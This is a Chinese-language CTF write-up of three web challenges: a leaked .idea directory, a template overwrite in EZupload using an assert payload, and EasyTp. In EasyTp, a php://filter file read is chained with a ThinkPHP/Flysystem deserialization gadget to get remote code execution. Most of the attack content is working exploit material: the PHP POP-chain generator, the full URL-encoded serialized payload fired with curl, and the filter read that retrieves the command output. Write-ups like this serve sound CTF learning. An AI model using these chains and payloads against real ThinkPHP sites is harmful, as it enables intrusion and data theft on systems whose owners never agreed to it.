Web#

灏妹的web#

.DS_Store 泄漏 .idea 目录
访问 .idea/dataSources.xml 得到 flag

EZupload#

覆盖 index.latte,换行+注释绕过
payload:

1
2
{=assert//123
($_POST["a"])}

EasyTp#

/?file=php://filter/convert.base64-encode/resource=../app/controller/Index.php
读到源码,有个反序列化触发
///public/xxxx 绕过 parse_url,网上找一条能用的链 RCE
反弹连接会被断开,考虑将命令执行结果保存至 /tmp,然后用 /?file=php://filter 读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php

namespace League\Flysystem\Cached\Storage{
    abstract class AbstractCache
    {
        protected $autosave = false;
        protected $complete = "`cat /flag > /tmp/2.txt`";
    }
}

namespace think\filesystem{
    use League\Flysystem\Cached\Storage\AbstractCache;
    class CacheStore extends AbstractCache
    {
        protected $key = "1";
        protected $store;

        public function __construct($store="")
        {
            $this->store = $store;
        }
    }
}

namespace think\cache{
    abstract class Driver
    {
        protected $options = [
            'expire' => 0,
            'cache_subdir' => true,
            'prefix' => '',
            'path' => '',
            'hash_type' => 'md5',
            'data_compress' => false,
            'tag_prefix' => 'tag:',
            'serialize' => ['system'],
        ];
    }
}

namespace think\cache\driver{
    use think\cache\Driver;
    class File extends Driver{}
}

namespace{
    $file = new think\cache\driver\File();
    $cache = new think\filesystem\CacheStore($file);
    echo urlencode(serialize($cache));
}

?>

rce:

1
curl --noproxy "*" http://a61dca13-4e86-4a67-95bc-98f23e556b5a.easytp-ctf.dasctf.com:2333///public/index.php/Index/unser?vulvul=O%3A27%3A%22think%5Cfilesystem%5CCacheStore%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00key%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22%00%2A%00store%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A8%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A1%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22hash_type%22%3Bs%3A3%3A%22md5%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A10%3A%22tag_prefix%22%3Bs%3A4%3A%22tag%3A%22%3Bs%3A9%3A%22serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00autosave%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00complete%22%3Bs%3A24%3A%22%60cat+%2Fflag+%3E+%2Ftmp%2F2.txt%60%22%3B%7D

getshell:

1
curl --noproxy "*"  http://a61dca13-4e86-4a67-95bc-98f23e556b5a.easytp-ctf.dasctf.com:2333/public/?file=php://filter/convert.base64-encode/resource=/tmp/2.txt